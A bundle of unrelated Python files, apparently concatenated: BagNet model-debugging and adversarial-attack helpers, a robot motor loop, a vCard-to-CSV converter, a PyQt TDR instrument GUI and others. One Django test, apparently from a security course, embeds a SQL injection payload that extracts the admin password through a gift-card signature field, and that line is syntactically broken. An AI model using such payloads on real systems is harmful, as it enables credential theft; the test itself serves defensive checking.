elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, kernel3=0, prefix=''):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
kernel = 1 if kernel3 == 0 else 3
layers.append(block(self.inplanes, planes, stride, downsample, kernel_size=kernel))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
kernel = 1 if kernel3 <= i else 3
layers.append(block(self.inplanes, planes, kernel_size=kernel))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
print('BagNet: shape after conv1 {}\n'.format(x.shape))
x = self.conv2(x)
print('BagNet: shape after conv2 {}\n'.format(x.shape))
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
print('BagNet: shape after layer1 {}\n'.format(x.shape))
x = self.layer2(x)
print('BagNet: shape after layer2 {}\n'.format(x.shape))
x = self.layer3(x)
print('BagNet: shape after layer3 {}\n'.format(x.shape))
x = self.layer4(x)
print('BagNet: shape after layer4 {}\n'.format(x.shape))
if self.avg_pool:
print('BagNet: kernel size of AvgPool2d: {}'.format(x.size()[2]))
x = nn.AvgPool2d(x.size()[2], stride=1)(x)
x = x.view(x.size(0), -1)
print('BagNet: shape after flattening: {}'.format(x.shape))
x = self.fc(x)
print('BagNet: shape of final output: {}'.format(x.shape))
else:
print('BagNet: return logits of patches')
x = x.permute(0,2,3,1)
print('BagNet: shape after transpose: {}'.format(x.shape))
x = self.fc(x)
print('BagNet: shape of final output: {}'.format(x.shape))
return x
def bagnet33_debug(pretrained=False, strides=[2, 2, 2, 1], **kwargs):
"""Constructs a Bagnet-33 model (Debugging mode).
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = BagNetDebug(BottleneckDebug, [3, 4, 6, 3], strides=strides, kernel3=[1,1,1,1], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['bagnet33']))
return model
###################################################
###################################################
# Helper function from 5-27 notebook
###################################################
class BottleneckRF(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, kernel_size=1):
super(BottleneckRF, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size, stride=stride,
padding=0, bias=False) # changed padding from (kernel_size - 1) // 2
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x, **kwargs):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
if residual.size(-1) != out.size(-1):
diff = residual.size(-1) - out.size(-1)
residual = residual[:,:,:-diff,:-diff]
out += residual
out = self.relu(out)
return out
class MaskLayer(nn.Module):
def __init__(self, shape, coordinate, device):
super(MaskLayer, self).__init__()
X, Y = coordinate
self.mask = torch.zeros(shape).to(device)
for x in X:
for y in Y:
self.mask[:, :, x, y] = 1
def forward(self, x):
return x*self.mask
class BagNetRF(nn.Module):
def __init__(self, block, mask, layers, strides=[1, 2, 2, 2], kernel3=[0, 0, 0, 0], num_classes=1000, avg_pool=True):
self.inplanes = 64
super(BagNetRF, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=1, stride=1, padding=0,
bias=False)
self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0,
bias=False)
self.bn1 = nn.BatchNorm2d(64, momentum=0.001)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], kernel3=kernel3[0], prefix='layer1')
self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], kernel3=kernel3[1], prefix='layer2')
self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], kernel3=kernel3[2], prefix='layer3')
self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], kernel3=kernel3[3], prefix='layer4')
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.avg_pool = avg_pool
self.block = block
self.mask = mask
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, kernel3=0, prefix=''):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
kernel = 1 if kernel3 == 0 else 3
layers.append(block(self.inplanes, planes, stride, downsample, kernel_size=kernel))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
kernel = 1 if kernel3 <= i else 3
layers.append(block(self.inplanes, planes, kernel_size=kernel))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
print('BagNet: shape after layer4 {}\n'.format(x.shape))
x = self.mask(x)
if self.avg_pool:
x = nn.AvgPool2d(x.size()[2], stride=1)(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
else:
x = x.permute(0,2,3,1)
x = self.fc(x)
return x
def bagnet33_RF(batch_size, coordinate, device, pretrained=False, strides=[2, 2, 2, 1], **kwargs):
"""Constructs a Bagnet-33 model (Receptive field mode).
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
mask = MaskLayer((batch_size, 2048, 24, 24), coordinate, device)
model = BagNetRF(BottleneckRF, mask, [3, 4, 6, 3], strides=strides, kernel3=[1,1,1,1], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['bagnet33']))
return model
###################################################
###################################################
# Helper function from 2019-5-29 notebook
##################################################
def get_topk_acc(y_hat, y):
""" Compute top-k accuracy
Input:
- y_hat: numpy array with shape (batchsize, K). top-k prediction classes
- y: numpy array with shape(batchsize, ). target classes
Return: top-k accuracy
"""
is_correct = [y[i] in y_hat[i] for i in range(y.size)]
is_correct = np.array(is_correct)
return is_correct.sum()/y.size
def validate(val_loader, model, device, k=5, clip=None, **kwargs):
"""Validate model's top-k accuracy
Input:
- val_loader: pytorch data loader.
- model: pytorch model
- device: context
- k (int): top-k accuracy
- clip (function): If not None, apply clipping on patch logits
Return:
val_acc: float
"""
# switch to evaluate mode
model.eval()
total_iter = len(val_loader)
cum_acc = 0
val_time = 0
with torch.no_grad():
start = time.time()
for i, (images, target) in enumerate(val_loader):
images, target = images.to(device), target.to(device)
tic = time.time()
if clip:
logits = model(images)
logits = clip(logits, **kwargs)
logits = torch.mean(logits, dim=(1, 2))
else:
logits = model(images)
tac = time.time()
# measure accuracy
_, y_hat = torch.topk(logits, k=k, dim=1)
y_hat, target = y_hat.cpu().numpy(), target.cpu().numpy()
acc = sum([target[i] in y_hat[i] for i in range(target.size)]) / target.size
cum_acc += acc
val_time += tac-tic
msg = 'Iteration {}, validation accuracy: {:.3f}, time: {}s'.format(i, acc, tac-tic)
print(msg)
logging.info(msg)
end = time.time()
val_acc = cum_acc / total_iter
msg = 'Validation accuracy: {:.3f}, validation time: {:.2f}, total time: {:.2f}s'.format(val_acc, val_time, end-start)
print(msg)
logging.info(msg)
return val_acc
####################################################
####################################################
# Helper functions from 2019-5-31 notebook
####################################################
def get_low_res_heatmap(bagnet, images, targets, clip=None, **kwargs):
"""Generates low-resolution heatmap for Bagnet-33
Input:
- bagnet (pytorch): Bagnet without average pooling
- images (pytorch tensor): images
- targets (int list): for which class the heatmap is computed for
Output: (numpy array) heatmap
"""
with torch.no_grad():
patch_logits = bagnet(images)
patch_logits = patch_logits.permute([0, 3, 1, 2]).cpu().numpy()
if clip:
patch_logits = clip(patch_logits, **kwargs)
N = images.shape[0]
heatmaps = np.zeros((N, 224, 224))
for z in range(N):
patch_target_logits = patch_logits[z, targets[z], :, :]
for p, i in enumerate(range(33, 224, 8)):
for q, j in enumerate(range(33, 224, 8)):
patch = np.full((33, 33), patch_target_logits[p, q])
heatmaps[z, i-33:i, j-33:j] += patch
return heatmaps
######################################################
######################################################
# Helper functions from 2019-6-15 notebook
######################################################
def generate_high_res_heatmap(model, patches, target, batchsize=1000, clip=None, **kwargs):
with torch.no_grad():
logits_list = []
for batch_patches in torch.split(patches, batchsize):
logits = model(batch_patches)
logits = logits[:, target]
if clip:
logits = clip(logits, **kwargs)
logits_list.append(logits.data.cpu().numpy().copy())
logits = np.hstack(logits_list)
return logits.reshape((224, 224))
def bagnet_patch_predict(bagnet, patches, batch_size=1000, k=1, return_class=True):
with torch.no_grad():
cum_logits = torch.zeros(1000).cuda() # ImageNet has 1000 classes
N = patches.shape[0]
for batch_patches in torch.split(patches, batch_size):
logits = bagnet(batch_patches)
sum_logits = torch.sum(logits, dim=0)
cum_logits += sum_logits
p = F.softmax(cum_logits/N, dim=0)
values, indices = torch.topk(p, k, dim=1)
if return_class:
return indices.cpu().numpy()
else:
return values.cpu().numpy()
#####################################################
#####################################################
# Helper functions from 2019-6-21 notebook
#####################################################
def pad_tensor_image(image, patchsize):
_, c, x, y = image.shape
padded_image = torch.zeros((c, x + patchsize - 1, y + patchsize - 1))
padded_image[:, (patchsize-1)//2 : (patchsize-1)//2 + x, (patchsize-1)//2 : (patchsize-1)//2 + y] = image[0]
return padded_image[None].float()
#####################################################
#####################################################
# Helper function from 2019-6-22 notebook
#####################################################
def undo_imagenet_preprocess(image):
""" Undo imagenet preprocessing
Input:
- image (pytorch tensor): image after imagenet preprocessing in CPU, shape = (3, 224, 224)
Output:
- undo_image (pytorch tensor): pixel values in [0, 1]
"""
mean = torch.Tensor([0.485, 0.456, 0.406]).view((3, 1, 1))
std = torch.Tensor([0.229, 0.224, 0.225]).view((3, 1, 1))
undo_image = image * std
undo_image += mean
return undo_image
#####################################################
######################################################
# Helper functions for CleverHans SPSA sticker attack
######################################################
class CleverhansDataLoader:
def __init__(self, images, labels):
""" An iterator yielding one image and its label at a time from a batch of images
Input:
- images (numpy array): shape (batch_size, 3, 224, 224)
- labels (numpy array): shape (batch_size, )
"""
self.images = images
self.labels = labels
self.length = images.shape[0]
self.count = -1
def __iter__(self):
return self
def __next__(self):
self.count += 1
if self.count < self.length:
return (self.images[self.count][None].copy(), np.array(self.labels[self.count]))
else:
raise StopIteration
def __len__(self):
return self.images.shape[0]
def load_image(img_path, mean=np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1)), std=np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))):
img = KImage.load_img(img_path, target_size=(224, 224))
img = KImage.img_to_array(img).transpose([2, 0, 1])
img /= 255
img = (img - mean)/std
return img
|
"""
树结构
- 总经理办公室
|- 财务部门
|- 业务部门
|- 销售一组
|- 销售二组
|- 生产部门
|- 研发组
|- 测试组
"""
class Node:
def __init__(self, name, duty):
self.name = name
self.duty = duty
self.children = []
def add(self, obj):
self.children.append(obj)
def remove(self, obj):
self.children.remove(obj)
# 递归打印
def display(self, number=1):
print("{}部门:{} 层级:{} 职责:{}".format((number-1)*"\t",self.name, number, self.duty))
n = number+1
for obj in self.children:
obj.display(n)
if __name__ == '__main__':
# 顶级
root = Node("总经理办公室", "总负责人")
# 二级
money = Node("财务部门", "公司财务管理")
operation = Node("业务部门", "销售产品")
production = Node("生产部门", "生产产品")
root.add(money)
root.add(operation)
root.add(production)
# 三级
sell_first = Node("销售一组", "A产品销售")
sell_second = Node("销售二组", "B产品销售")
operation.add(sell_first)
operation.add(sell_second)
# 三级
creat = Node("研发组", "研发组组长")
test = Node("测试组", "测试组组长")
production.add(creat)
production.add(test)
root.display()
|
from math import exp
from curves import getPropellerArray
from simulation import runSimulation
from writeInput import writeInput
L = 0.257 # propeller's length
def computeI(r,c):
# r and c are the radius and chord arrays given to the simulation
# you can give them by hand or use the return values of 'getPropellerArray'
samples = len(r)
f = lambda r,c: c * r**2
sum1toN_1 = 0
for i in range(1,samples-1):
sum1toN_1 += 2*f(r[i],c[i])
I = L * ( f(r[0], c[0]) + f(r[samples-1], c[samples-1]) + sum1toN_1 ) / (2*samples)
return I
def calculateCost(omega,vel,r,c):
# omega is the terminal angular velocity returned by 'runSimulation'
# vel is the linear terminal velocity returned by 'runSimulation'
# r and c are the radius and chord arrays given to the simulation
VelCost = lambda v : 10*exp(-40/(v-12)**2)
I = computeI(r,c)
BladeCost = 10*(I*omega+VelCost(vel))
return BladeCost, omega, vel
def cost(x):
# input: bezier control points in an array
# output: propeller's cost
y1,y2,y3,y4,t1,t2,t3 = x
r, c, t = getPropellerArray(y1,y2,y3,y4,t1,t2,t3,L)
writeInput(r,c,t)
w, v = runSimulation()
return calculateCost(w,v,r,c)
|
from time import clock, sleep
import sys
import signal
import math
import logging
from ev3dev.auto import Motor, LargeMotor, GyroSensor, PowerSupply
from device import read_device, set_duty
g_log = logging.getLogger(__name__)
########################################################################
##
## Runner_stub:Runnerのスタブ
## ライントレーサー開発等で倒立振子ライブラリを使いたくない場合はrunner_stub()を使用すること
##
########################################################################
def runner_stub(sh_mem):
print('Im Runner Stub')
def shutdown_child(signum=None, frame=None):
motor_encoder_left_devfd.close()
motor_encoder_right_devfd.close()
motor_duty_cycle_left_devfd.close()
motor_duty_cycle_right_devfd.close()
tail_motor.stop_action = tail_motor.STOP_ACTION_COAST
tail_motor.stop()
left_motor.stop()
right_motor.stop()
sys.exit()
signal.signal(signal.SIGTERM, shutdown_child)
try:
# Motor setup
left_motor = LargeMotor('outC')
right_motor = LargeMotor('outB')
left_motor.reset()
right_motor.reset()
left_motor.run_direct()
right_motor.run_direct()
#しっぽモーター
tail_motor = Motor('outA')
# しっぽモーターを固定する
tail_motor.stop_action = tail_motor.STOP_ACTION_HOLD
tail_motor.stop()
########################################################################
## Definitions and Initialization variables
########################################################################
# Timing settings for the program
# Time of each loop, measured in miliseconds.
loop_time_millisec = 100
# Time of each loop, measured in seconds.
loop_time_sec = loop_time_millisec / 1000.0
motor_angle_raw_left = 0
motor_angle_raw_right = 0
motor_angular_speed_reference = 0.0
a_r = 0.985 #0.98 # ローパスフィルタ係数(左右車輪の目標平均回転角度用)。左右モーターの目標平均回転角度(rad)の算出時に使用する。小さいほど前進・後退する反応が早くなる。
k_theta_dot = 3.5 # モータ目標回転角速度係数
# filehandles for fast reads/writes
# =================================
# Open motor files for (fast) reading
motor_encoder_left_devfd = open(left_motor._path + "/position", "rb")
motor_encoder_right_devfd = open(right_motor._path + "/position", "rb")
# Open motor files for (fast) writing
motor_duty_cycle_left_devfd = open(left_motor._path + "/duty_cycle_sp", "w")
motor_duty_cycle_right_devfd = open(right_motor._path + "/duty_cycle_sp", "w")
speed_reference = sh_mem.read_speed_mem()
steering = sh_mem.read_steering_mem()
########################################################################
## タッチセンサー押し待ち
########################################################################
print('Runner Waiting ...')
while not sh_mem.read_touch_sensor_mem():
sleep(0.025)
print("-----------------------------------")
print("GO!")
print("-----------------------------------")
# 倒立振子スタート時の時間取得
t_balancer_start = clock()
while True:
###############################################################
## Loop info
###############################################################
t_loop_start = clock()
###############################################################
## Reading the Motor Position
###############################################################
motor_angle_raw_left = read_device(motor_encoder_left_devfd)
motor_angle_raw_right = read_device(motor_encoder_right_devfd)
sh_mem.write_motor_encoder_left_mem(motor_angle_raw_left)
sh_mem.write_motor_encoder_right_mem(motor_angle_raw_right)
speed_reference = sh_mem.read_speed_mem()
motor_angular_speed_reference = ((1.0 - a_r) * ((speed_reference / 100.0) * k_theta_dot)) + (a_r * motor_angular_speed_reference)
###############################################################
## Computing the motor duty cycle value
###############################################################
motor_duty_cycle = motor_angular_speed_reference
###############################################################
## Apply the signal to the motor, and add steering
###############################################################
steering = sh_mem.read_steering_mem()
set_duty(motor_duty_cycle_right_devfd, speed_reference + steering)
duty = set_duty(motor_duty_cycle_left_devfd, speed_reference - steering)
###############################################################
## Busy wait for the loop to complete
###############################################################
# clock()の値にはsleep中の経過時間が含まれないので、このwhileの条件文の算出時間をsleep代わりにしている(算出時間はバラバラ…)
sleep(max(loop_time_sec - (clock() - t_loop_start), 0.002))
except Exception as ex:
print("It's a Runner Exception")
g_log.exception(ex)
shutdown_child()
|
#KZ: SQL Injection - we use the open areas to try and get an admin password
from django.test import TestCase, Client
from django.urls import reverse
from django.http import HttpRequest
from LegacySite.models import *
from LegacySite.views import *
import json
import io
class SQLTest(TestCase):
def setUp(self):
self.client = Client()
def sql_test(self):
try:
#KZ: Here, we implement the union vulnerability, while also creating a generic username/password
response =""
password = 'Pepper1234'
SaltyCustomer = User.objects.create(username='SaltyCustomer', password='Pepper1234')
#KZ: dummyProduct = Product.objects.create(product_name = 'test', product_image_path= 'test', recommended_price = 1, description = 'test')
#KZ dummyCard = Card.objects.create(id = 1, data= '123,34'.encode(), product = dummyProduct, amount = 95, fp='/tmp/addedcard_2_1.gftcrd',user=SaltyCustomer,used=1)
data = io.StringIO {"merchant_id": "NYU Apparel Card", "customer_id": "SaltyCustomer", "total_value": "1999", "records": [{"record_type": "amount_change", "amount_added":2000, "signature": "' UNION select password from LegacySite_user where username = 'admin' || '"}]}
#data = io.StringIO('{"merchant_id": "NYU Apparel Card", "customer_id": "SaltyCustomer", "total_value": "1999", "records": [{"record_type": "amount_change", "amount_added":2000, "signature": "[]"}]}')
filename="tests/Attack3-Injection_Attack.gftcrd"
response = self.client.post('/use.html', {'card_data': data, 'filename' : filename, 'card_supplied': True, 'card_fname': 'test'},)
#KZ: Commenting out these lines when not in use
#print(response.content)
#open("test.html","w").write(response.content.decode('utf-8'))
#self.assertNotContains(response, password)
raise Exception('dummy exception')
except Exception as ex:
if response != "" and password in response.content.decode('utf-8'):
self.assertNotContains(response, password)
else:
assert 1==1
|
#!/usr/bin/env python
"""Parse vcard stream from stdin, output a CSV for consumption by Office365
"""
import sys
import csv
from collections import namedtuple, OrderedDict
vcard_collection = []
FIELDS_CSV = 'ExternalEmailAddress Name FirstName LastName StreetAddress City StateorProvince PostalCode Phone MobilePhone Pager HomePhone Company Title OtherTelephone Department CountryOrRegion Fax Initials Notes Office Manager'.split()
def new_vcard(suffix):
global the_vcard
the_vcard = {a: '' for a in FIELDS_CSV}
the_vcard['Manager'] = 'parse_vcard.py'
def vcard_version(suffix):
global the_vcard
the_vcard['version'] = suffix
def vcard_name(suffix):
global the_vcard
try:
ln, fn, _ = suffix.split(';', 2)
except Exception:
ln = suffix
fn = ''
the_vcard['LastName'] = ln
the_vcard['FirstName'] = fn
def vcard_fullname(suffix):
global the_vcard
the_vcard['Name'] = suffix
def vcard_phone(suffix):
global the_vcard
typ, val = suffix.split(':', 1)
_, typ = typ.split('=')
if typ == 'home':
the_vcard['HomePhone'] = val
elif typ == 'CELL':
the_vcard['MobilePhone'] = val
elif typ == 'work':
the_vcard['Phone'] = val
else:
the_vcard['OtherTelephone'] = val
def vcard_company(suffix):
global the_vcard
the_vcard['Company'] = suffix
def vcard_title(suffix):
global the_vcard
the_vcard['Title'] = suffix
def vcard_email(suffix):
global the_vcard
typ, val = suffix.split(':', 1)
the_vcard['ExternalEmailAddress'] = val
def vcard_addr(suffix):
global the_vcard
typ, val = suffix.split(':', 1)
_, typ = typ.split('=', 1)
try:
_, _, full, street, city, state, zipcode, country = val.split(';')
except ValueError:
full = street = city = state = zipcode = country = ''
the_vcard['PostalCode'] = zipcode
the_vcard['StateorProvince'] = state
the_vcard['City'] = city
the_vcard['StreetAddress'] = street
the_vcard['CountryOrRegion'] = country
def vcard_note(suffix):
global the_vcard
the_vcard['Notes'] = suffix
def vcard_department(suffix):
global the_vcard
the_vcard['Department'] = suffix
def vcard_end(suffix):
global the_vcard
global vcard_collection
the_vcard.pop('version')
c = Contact(**the_vcard)
vcard_collection.append(c)
def parse_vcard(line):
fun = None
pre = None
for p, f in prefixes.items():
if not line.startswith(p):
continue
fun = f
pre = p.strip()
if not fun:
print("cannot parse>", line)
return -1
suffix = line[len(pre):].strip()
fun(suffix)
prefixes = {
'BEGIN:VCARD': new_vcard,
'VERSION:': vcard_version,
'N:': vcard_name,
'FN:': vcard_fullname,
'TEL;': vcard_phone,
'ORG:': vcard_company,
'TITLE:': vcard_title,
'EMAIL;': vcard_email,
'ADR;': vcard_addr,
'NOTE:': vcard_note,
'X-DEPARTMENT:': vcard_department,
'END:VCARD': vcard_end,
}
Contact = namedtuple('Contact', FIELDS_CSV)
for line in sys.stdin.readlines():
parse_vcard(line)
with open(sys.argv[1], 'w') as f:
c = csv.writer(f)
c.writerow(FIELDS_CSV)
c.writerows([[getattr(r, v) for v in FIELDS_CSV] for r in vcard_collection])
|
# tdr.py
# ================================================================================
# BOOST SOFTWARE LICENSE
#
# Copyright 2020 BitWise Laboratories Inc.
# Original Author.......Jim Waschura
# Contact...............info@bitwiselabs.com
#
# Permission is hereby granted, free of charge, to any person or organization
# obtaining a copy of the software and accompanying documentation covered by
# this license (the "Software") to use, reproduce, display, distribute,
# execute, and transmit the Software, and to prepare derivative works of the
# Software, and to permit third-parties to whom the Software is furnished to
# do so, all subject to the following:
#
# The copyright notices in the Software and this entire statement, including
# the above license grant, this restriction and the following disclaimer,
# must be included in all copies of the Software, in whole or in part, and
# all derivative works of the Software, unless such copies or derivative
# works are solely in the form of machine-executable object code generated by
# a source language processor.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT
# SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE
# FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ================================================================================
import datetime
import math
import os
import numpy
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QVBoxLayout, QApplication, QMainWindow
from matplotlib import pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from popup import Popup
from connect import Connect
from settings import Settings
class Tdr(Settings):
def __init__(self, mainWindow: QMainWindow):
super().__init__(mainWindow)
# print("Tdr::__init__()")
# Establish event handlers
self.buttonTDRRefresh.clicked.connect(self.buttonTDRRefresh_clicked)
self.buttonTDRClear.clicked.connect(self.buttonTDRClear_clicked)
self.buttonTDRRunSingle.clicked.connect(self.buttonTDRRunSingle_clicked)
self.buttonTDRResetView.clicked.connect(self.buttonTDRResetView_clicked)
self.buttonTDRSaveResults.clicked.connect(self.buttonTDRSaveResults_clicked)
self.numTDRCursorX1.editingFinished.connect(self.numTDRCursorX1_editingFinished)
self.numTDRCursorX2.editingFinished.connect(self.numTDRCursorX2_editingFinished)
# Initialize results variables
self.TDRLogFileContents = None
self.TDRResultsDateTime = None
self.TDRchartFigure = plt.figure()
self.TDRchartFigure.set_tight_layout(True)
self.TDRchartCanvas = FigureCanvas(self.TDRchartFigure)
self.chartToolbar = NavigationToolbar(self.TDRchartCanvas, mainWindow)
vLayout = QVBoxLayout()
vLayout.addWidget(self.TDRchartCanvas)
vLayout.addWidget(self.chartToolbar)
self.chartToolbar.hide()
self.TDRChartLayout.addLayout(vLayout)
self.TDRcurrentPlot = None
self.TDRcurrentShadowPlot = None
self.TDRchartLeft = None
self.TDRchartWidth = None
self.TDRshadowFigure = plt.figure()
self.TDRshadowFigure.set_tight_layout(True)
self.TDRshadowCanvas = FigureCanvas(self.TDRshadowFigure)
def buttonTDRRefresh_clicked(self):
# print("Tdr::buttonTDRRefresh_clicked")
try:
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRClear_clicked(self):
# print("Tdr::buttonTDRClear_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
Connect.getDevice().Clear()
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRResetView_clicked(self):
# print("Tdr::buttonTDRResetView_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
Connect.getDevice().Tdr.Reset()
Connect.getDevice().WaitForRunToStart()
Connect.getDevice().WaitForRunToComplete(120.0)
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRSaveResults_clicked(self):
# print("Tdr::buttonTDRSaveResults_clicked")
try:
# ensure directories exist
self.ensureDirectoriesExist()
# if results subdirectory doesn't exist, create it
results_subdir = os.path.normpath(
self.editDataDirectory.text().strip() + "/" + self.editResultsName.text().strip())
# print("results_subdir is: " + results_subdir)
if not os.path.exists(results_subdir):
os.mkdir(results_subdir)
name_nospace = self.editResultsName.text().strip().replace(" ", "_")
if self.TDRResultsDateTime is None:
self.TDRResultsDateTime = datetime.datetime.now()
dt_string = self.TDRResultsDateTime.strftime("_%Y-%m-%d_%Hh%Mm%Ss")
chart_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Chart" + dt_string + ".png")
csv_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Csv" + dt_string + ".csv")
pivot_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Pivot"+ dt_string + ".csv")
# print("chart_file_name is: " + chart_file_name)
# print("csv_file_name is: " + csv_file_name)
# retrieve CSV file and store in results subdirectory
if self.checkSaveCSV.isChecked():
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
try:
csv_remote_file = Connect.getDevice().Tdr.Csv()
# print("csv remote file is: ", csv_remote_file)
csv_file_contents = Connect.getDevice().File.Fetch(csv_remote_file).decode(encoding='utf-8')
f = open(csv_file_name, "w")
f.write(csv_file_contents)
f.close()
except Exception as e:
print("Problem saving CSV file: ", e)
raise e
# save Pivot log file in results subdirectory
if self.TDRLogFileContents is not None:
try:
f = open(pivot_file_name, "w")
f.write(self.TDRLogFileContents)
f.close()
except Exception as e:
print("Problem saving pivot file: ", e)
raise e
# save current chart in results subdirectory
if self.checkSaveCharts.isChecked():
if self.TDRcurrentShadowPlot is not None:
self.TDRshadowFigure.savefig(chart_file_name,
dpi=300,
format="png",
pad_inches=0.5,
orientation='portrait',
papertype="letter",
edgecolor="black")
Popup.info("TDR results saved to: " + results_subdir, "Save TDR Results")
except Exception as e:
Popup.error(e)
def buttonTDRRunSingle_clicked(self):
# print("Tdr::buttonTDRRunSingle_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
self.buttonTDRRunSingle.setEnabled(False)
self.buttonTDRRefresh.setEnabled(False)
self.buttonTDRResetView.setEnabled(False)
self.buttonTDRSaveResults.setEnabled(False)
self.buttonTDRClear.setEnabled(False)
self.numTDRCursorX1.setEnabled(False)
self.numTDRCursorX2.setEnabled(False)
QApplication.processEvents()
Connect.getDevice().RunSingle()
Connect.getDevice().WaitForRunToComplete(120.0)
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
finally:
self.buttonTDRRunSingle.setEnabled(True)
self.buttonTDRRefresh.setEnabled(True)
self.buttonTDRResetView.setEnabled(True)
self.buttonTDRSaveResults.setEnabled(True)
self.buttonTDRClear.setEnabled(True)
self.numTDRCursorX1.setEnabled(True)
self.numTDRCursorX2.setEnabled(True)
pass
def numTDRCursorX1_editingFinished(self):
# print("Tdr::numTDRCursorX1_editingFinished")
try:
Connect.getDevice().Tdr.Chart.setCursValue(0, math.floor(self.numTDRCursorX1.value()))
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def numTDRCursorX2_editingFinished(self):
# print("Tdr::numTDRCursorX2_editingFinished")
try:
Connect.getDevice().Tdr.Chart.setCursValue(1, math.floor(self.numTDRCursorX2.value()))
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
# override
def editResultsName_editingFinished(self):
super().editResultsName_editingFinished()
# print("Tdr::editResultsName_editingFinished()")
if self.TDRcurrentPlot is not None:
self.TDRcurrentPlot.set_title(
"TDR" if self.editResultsName.text() == "" else (self.editResultsName.text() + "\nTDR"))
self.TDRchartCanvas.draw()
if self.TDRcurrentShadowPlot is not None:
self.TDRcurrentShadowPlot.set_title(
"TDR" if self.editResultsName.text() == "" else (self.editResultsName.text() + "\nTDR"))
self.TDRshadowCanvas.draw()
# override
def setConnectionDependentEnables(self, newValue: bool):
super().setConnectionDependentEnables(newValue)
# print("Tdr::setConnectionDependentEnables(), newValue=", newValue)
self.buttonTDRRefresh.setEnabled(newValue)
self.buttonTDRRunSingle.setEnabled(newValue)
self.buttonTDRResetView.setEnabled(newValue)
self.buttonTDRClear.setEnabled(newValue)
self.buttonTDRSaveResults.setEnabled(newValue)
self.numTDRCursorX1.setEnabled(newValue)
self.numTDRCursorX2.setEnabled(newValue)
# override
def refreshResults(self, flag: int):
super().refreshResults(flag)
# print("Tdr::refreshResults()")
if (flag & 0x1) == 0:
return
# Fetch cursor positions
x1 = Connect.getDevice().Tdr.Chart.getCursValue(0)
x2 = Connect.getDevice().Tdr.Chart.getCursValue(1)
# print("CursorX1 =", x1, ", CursorX2 =", x2);
